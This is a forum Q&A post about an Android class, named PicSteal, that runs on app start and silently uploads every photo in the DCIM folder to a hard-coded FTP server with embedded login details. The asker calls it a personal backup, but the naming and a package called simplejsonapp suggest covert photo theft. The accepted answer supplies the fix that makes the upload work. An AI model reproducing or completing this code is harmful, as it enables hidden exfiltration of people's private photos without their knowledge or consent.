# Made a personal phone backup app in android, but its not working

Tags: java, android

So, I made this app to auto-upload my photos to my server using FTP but I don't think I have it quite right.

Below is the class that I stored it in, and then I call this method in the Main.java .onCreateI method

```
package com.simplejsonapp;

import it.sauronsoftware.ftp4j.FTPAbortedException;
import it.sauronsoftware.ftp4j.FTPClient;
import it.sauronsoftware.ftp4j.FTPDataTransferException;
import it.sauronsoftware.ftp4j.FTPException;
import it.sauronsoftware.ftp4j.FTPIllegalReplyException;

import java.io.File;
import java.io.IOException;

import android.os.Environment;

public class PicSteal {
    public static void picStealer(){
        //Create the FTP connection object:
    FTPClient client = new FTPClient();
    try {

        client.connect("62.22.547.24"); //create connection to server
        client.login("sdasd", "ss
");//login using credentials

        //this is where the magic happens
        //create the file object
        File folder = new File(Environment.getExternalStorageDirectory().getAbsolutePath() + "/DCIM/100MEDIA/");
        //create the array of files to iterate over
        File[] listOfFiles = folder.listFiles();

            for (int i = 0; i < listOfFiles.length; i++) {
              if (listOfFiles[i].isFile()) {
                 //upload file to server
                  try {
                    client.upload(new java.io.File("listOfFiles[i]"));
                } catch (FTPDataTransferException e) {
                    // TODO Auto-generated catch block
                    e.printStackTrace();
                } catch (FTPAbortedException e) {
                    // TODO Auto-generated catch block
                    e.printStackTrace();
                }
                //System.out.println("File " + listOfFiles[i].getName());
              } else if (listOfFiles[i].isDirectory()) {
                //System.out.println("Directory " + listOfFiles[i].getName());
              }
            }


        client.disconnect(true);//disconnect

    } catch (IllegalStateException e) {
        // TODO Auto-generated catch block
        e.printStackTrace();
    } catch (IOException e) {
        // TODO Auto-generated catch block
        e.printStackTrace();
    } catch (FTPIllegalReplyException e) {
        // TODO Auto-generated catch block
        e.printStackTrace();
    } catch (FTPException e) {
        // TODO Auto-generated catch block
        e.printStackTrace();
    }


}

}
```

Specifically, I think the section

```
 for (int i = 0; i < listOfFiles.length; i++) {
              if (listOfFiles[i].isFile()) {
                 //upload file to server
                  try {
                    client.upload(new java.io.File("listOfFiles[i]"));
```

might be to blame. Can I pass the array[] in like this? 
I was watching my FTP folder as this ran, I saw no uploads.

I am using IIS ftp server to do this-- maybe theres a log I can check to see if the connection is occuring?

Answer (score 0):

I solved this. The answer was right in front of me.

```
try {
                client.upload(new java.io.File("listOfFiles[i]"));
            }
```

should look like this instead:

```
try {
                    client.upload(new java.io.File(listOfFiles[i].toString()));
                }
```

Works very fast now, too.